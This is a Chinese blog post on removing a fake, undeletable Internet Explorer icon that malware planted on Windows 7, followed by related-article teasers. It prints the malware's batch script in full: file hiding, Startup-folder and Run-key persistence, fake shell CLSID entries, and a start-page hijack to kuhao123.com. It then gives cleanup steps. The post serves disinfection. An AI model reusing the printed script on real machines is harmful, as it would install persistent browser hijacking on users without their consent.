Windows7下删除假顽固IE浏览器(或空白图标)的根本方法(中毒严重)

最新推荐文章于 2024-07-16 17:10:08 发布
最新推荐文章于 2024-07-16 17:10:08 发布
阅读量2.1k 收藏
点赞数
分类专栏: 技术资料 文章标签: windows 浏览器 ie microsoft internet shell
有时候中毒,桌面上会出现一个无文件名的空白文件(疑似假冒的IE浏览器),且无法删除,前篇讲到Windows7下删除空白文件的方法,但是却治标不治本,注册表删除了一遍,在登录IE还是会再出现空白图标的!所以我在网上搜到了个方法试了试,现在说一下解决办法。

  在winrar所在的文件夹中,可以找到Internet expl0orer(不是Internet explorer,多了一个0)、dodo.vbs、doit.vbs、sys.cmd、system.cmd等可以文件,用记事本打开system.cmd或sys.cmd,我们可以看到这样的代码:

   
attrib +r +h +s ".\do.vbs" attrib +r +h +s ".\doit.vbs" attrib +r +h +s ".\start.vbs" attrib +r +h +s ".\system.cmd" copy .\LABEL.lnk "%USERPROFILE%\「开始」菜单\程序\启动\LABEL.lnk"

  attrib +r "%USERPROFILE%\「开始」菜单\程序\启动\LABEL.lnk"

  copy .\LABEL.lnk "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\LABEL.lnk" attrib +r "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\LABEL.lnk"

  attrib -r "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk"

  del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk" attrib -r "%USERPROFILE%\桌面\Internet Explorer.lnk"

  del "%USERPROFILE%\桌面\Internet Explorer.lnk" attrib -r "%USERPROFILE%\桌面\Internet.lnk" del "%USERPROFILE%\桌面\Internet.lnk"

  REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}"

  REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f

  REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\DefaultIcon" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\InProcServer32" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\InProcServer32" /ve /t REG_SZ /d "%%systemRoot%%\system32\shdocvw.dll" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell" /ve /t REG_SZ /d "打开主页(&H)" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\打开 主页(&H)\Command" /ve /t REG_SZ /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.kuhao123.com/?sys" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\属性 (&R)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\属性 (&R)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\shell\属性 (&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DFFFF}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f copy ".\Internet Expl0rer.lnk" "%USERPROFILE%\桌面\Internet Expl0rer.lnk" attrib +r -h -s ".\Internet Expl0rer.lnk" "%USERPROFILE%\桌面\Internet Expl0rer.lnk" attrib -r "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" del "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk" copy ".\Internet Expl0rer.lnk" "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Expl0rer.lnk" attrib +r -h -s "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Expl0rer.lnk" REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Desktop\NameSpace\{00000108-00 00-0010-8000-00AA006DCCCC}" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\DefaultIcon" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\InProcServer32" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\InProcServer32" /ve /t REG_SZ /d "%%systemRoot%%\system32\shdocvw.dll" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell" /ve /t REG_SZ /d "打开主页(&H)" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\打开 主页(&H)\Command" /ve /t REG_SZ /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.kuhao123.com/?sys" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\属性 (&R)" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\属性 (&R)\Command" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\shell\属性 (&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000- 00AA006DCCCC}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run" /v "Default Action" /t reg_sz /d "C:\Program Files\Common Files\LABEL.lnk" /f REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.kuhao123.com/?home" /f REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t REG_SZ /d "http://www.9281.net/?home" /f



  那就反操作吧!处理过程:

  (1)删除掉上述可疑文件,注意新出现的IE图标还无法删除呢;

  (2) 整个删除注册表中HKEY_CLASSES_ROOT\CLSID \{00000108-0000-0010-8000-00AA006DFFFF}项;

  (3)搜索注册表中00000108-0000-0010-8000-00AA006DCCCC项和键值,全部删除;

  (4)删除HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Run下,有关LABEL.lnk 的键;

  (5)修改HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main的开始页和默认页的网址,去掉那两个垃圾网页;

  (6)修改HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion \Policies\Explorer项下,NoInternetIcon键值为0,即显示IE图标。(7)搜索全盘所有后缀为exe.vbs的文件,即搜索“*.exe.vbs”,出来的都是1KB大小且创建时间一样,全部删除!

  (8)修复安装在软件的快捷方式(无论是在桌面上的,还是开始程序中或是快速启动里的),在常规中去掉只读属性,修改目标到软件exe文件。当然也可以删掉快捷方式,重新建,因为软件的主体并没有被病毒破坏。

  至此,全部查杀毒过程结束。
飞雪剑魂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算机的桌面,如何删除桌面Internet Explorer图标
weixin_42813171的博客
06-24 478
方法一:用WINDOWS清理助手或者手动杀毒,均可砍掉流氓软件的启动项和服务/驱动。方法二:注:这个恶意软件还会修改开始菜单上的IE属性,在HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command下修改"C:\Program Files\Internet Explorer\iexplo...
清除恶意软件在桌面安装的IE图标方法
anjichan4261的博客
03-19 235
有时在安装网上下载的小工具软件时,经常会被病毒、木马、恶意软件感染。我安装了一个小软件,发现打开ie时总是跳转到一个网页,而ie浏览器中默认网页中并没有设置,用超级兔子,360也查不出来。查不出来的原因是桌面的这个ie是一个的ie,所以要把桌面的ie图标清除掉。打开C:/Documents and Settings/Administrator/桌面 目录并没有看到这个ie图标...
注册表添加右键菜单快捷启动
E梦电子--whble
12-13 834
注册表(Registry,繁体中文版Windows操作系统称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息。早在Windows 3.0推出OLE技术的时候,注册表就已经出现。随后推出的Windows NT是第一个从系统级别广泛使用注册表的操作系统。但是,从Windows 95操作系统开始,注册表才真正成为Windows用户经常接触的内容,并...
删除桌面的顽固IE(Internet Explorer)图标
若释·飞语
03-18 2万+
桌面上的ie图标简直有毒,好多人抱怨删不掉啊删不掉。以下提供删除桌面ie图标的解决方案 第一种方案: win+R 输入gpedit.msc 回车,执行下图中操作: 双击打开如下图,启用此处配置即可: 若以上方案无效,我们从注册表修改: 依旧是win+R ,执行regedit,如下图: 进入注册表,一次找到以下路径: HKEY_LOCAL_MACHINE\SOFTW...
教您去掉ie网页加载进度条的方法
09-05
相信很多同仁做的系统后到都是用frameset或iframe来加载不同页面的,不可不知道大家有没有注意到,当frame框架中的页面已经加载完成后,可是ie浏览器的状态栏还会一直显示一个正在加载的状态。
桌面IE图标删除,顽固IE图标删除工具
09-19
然而,有时候我们可能希望移除某些不需要的图标,比如IE浏览器图标,尤其是当它变得“顽固”,无法通过常规方法删除时。这里我们将深入探讨如何处理这种情况,并介绍一种名为“顽固IE图标删除工具”的解决方案。 ...
删除顽固IE图标
12-03
然而,有些情况下,这个图标可能会显得顽固,常规的卸载或桌面图标删除方法可能无法奏效。本文将深入探讨如何处理这种顽固的IE图标问题,并解释相关的计算机知识。 首先,我们需要理解为什么IE图标会变得难以删除。...
易语言删除顽固桌面图标
08-22
易语言删除顽固桌面图标源码系统结构:周期查找删除广告图标,Unicode转Ansi,WideCharToMultiByte,SHChangeNotify, ======窗口程序集1 || ||------__启动窗口_创建完毕 || ||------周期查找删除广告图标 ||
易语言源码易语言删除顽固桌面图标源码.rar
03-30
顽固桌面图标是指那些无法通过常规方法(如拖放到回收站或右键菜单删除)移除的图标。这通常是因为这些图标与仍在运行的程序或者系统服务有关联,或者被恶意软件篡改导致的。 删除顽固桌面图标时,我们需要编写能够...
桌面ie图标删不掉的解决技巧
explore_inload的博客
08-19 1万+
   问题来源: 安装SQLyog - 64 bit软件后,自动在桌面上创建了Internet Explorer启动图标,还不能通过点击右键进行删除。    以下方法转载自: 桌面ie图标删不掉的解决技巧    1.从开始或者按WIN+R打开运行,输入REGEDIT,打开注册表编辑器; 2.定位到注册表:HKEY_LOCAL_MACHINE SOFTWARE Microsoft Wind...
系统图标及其注册表项
晴天的专栏
03-15 3262
在桌面右击--属性----效果---在里面可以更改系统图标  改注册表:  作 用:修改系统文件夹的图标  路 径:HKEY_CLASSES_ROOT\CLSID\系统文件夹的ID  键值名称:DefaultIcon  键 值:缺省数据修改为你喜欢的图标所在的位置。  作 用:快捷方式图标上的箭头  路 径:HKEY_CLASSES_ROOT\lnkfile、HKEY_CLASS
任务栏程序图标显示白色的解决方法
热门推荐
DearMorning的博客
03-07 7万+
问题:电脑任务栏锁定的某程序图标显示为白色,而其它图标显示正常。解决:1."win”+“R键”弹出运行窗口,输入%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar2.在弹出的TaskBar文件夹中,发现没有图标显示异常的快捷方式。将该程序的快捷方式放入到TaskBar文件夹3.重新运行该程序,若未恢复图标,在...
删除电脑桌面的IE(Internet Explorer)浏览器图标
weixin_47268710的博客
01-18 2021
首先打开 Win + R 输入: 在地址栏输入: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 直接删除该项就可以了, 不用在意值是什么,删除后刷新桌面就可以看到IE图标已经消失了。 ...
如何用注册表删除Win10桌面上的顽固IE图标
Gunther的博客
08-16 1万+
Win7/Win8/Win10桌面上的IE浏览器顽固图标删不掉的解决方法。   顽固IE图标其实是这样的   用直接右键删除是不起作用的,可以看到,直接点击右键的话是没有删除选项的,按照度娘的方法:360急救箱、金山急救箱、windows清理助手、注册表删除项等方法均告失败。   正确的操作方法应该是这样的   第一步:按“win+R”打开运行窗口,输入“regedit”后
桌面两个IE,如何删除的IE浏览器
01-18 1231
 我也不知道怎么弄得,自动给我安装风行等恶意软件,卸载后又发现桌面多了个IE,菜单都是一样的,也有删除,就是删除不了,打开后指向一个网站,属性里面指定当前页为主业显灰色,无法修改。两个IE打开的主页都不一样,第一个是正常设置的主页,第二个不是,打开后不是正规的网站,后面的那个IE图标删除删不掉,提示只读···· 解决方法: 开始——运行——输入——regedit——查找注册表[HKEY_LOCA
Web前端-Web开发HTML基础2-list
最新发布
a15735748145a的博客
07-16 104
13. 写一个列表标签,生成一个自定义列表,名称为"自定义列表",有三条记录,默认都为"记录",每个记录各有一个注释,默认为"注释";14. 写一个列表标签,生成一个自定义列表,名称为"自定义列表",有四条记录,默认都为"记录",每个记录各有两个注释,默认为"注释";15. 写一个列表标签,生成一个自定义列表,名称为"自定义列表",有五条记录,默认都为"记录",每个记录各有三个注释,默认为"注释";11. 写一个列表标签,生成一个有四条有初始值记录的有序列表;5. 自定义列表项dt标签有没有结束标签呢?
CAD绘图机巧及快捷键
04-18
85条高级AutoCAD工程师绘图技巧 1.如何替换找不到的原文字体?   复制要替换的字库为将被替换的字库名,如:打开一幅图,提示未找到字体jd,你想用hztxt.shx替换它,那么你可以去找AutoCAD字体文件夹(font)把里面的hztxt.shx 复制一份,重新命名为jd.shx,然后在把XX.shx放到font里面,在重新打开此图就可以了。以后如果你打开的图包含jd这样你机子里没有的字体,就再也不会不停的要你找字体替换了。 2.如何删除顽固图层?   方法1:将无用的图层关闭,全选,COPY 粘贴至一新文件中,那些无用的图层就不会贴过来。如果曾经在这个不要的图层中定义过块,又在另一图层中插入了这个块,那么这个不要的图层是不能用这种方法删除的。   方法2: 选择需要留下的图形,然后选择文件菜单->输出->块文件,这样的块文件就是选中部分的图形了,如果这些图形中没有指定的层,这些层也不会被保存在新的图块图形中。   方法3:打开一个CAD文件,把要删的层先关闭,在图面上只留下你需要的可见图形,点文件-另存为,确定文件名,在文件类型栏选*.DXF格式,在弹出的对话窗口中点工具-选项-DXF选项,再在选择对象处打钩,点确定,接着点保存,就可选择保存对象了,把可见或要用的图形选上就可以确定保存了,完成后退出这个刚保存的文件,再打开来看看,你会发现你不想要的图层不见了。   方法4:用命令laytrans,可将需删除的图层影射为0层即可,这个方法可以删除具有实体对象或被其它块嵌套定义的图层。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值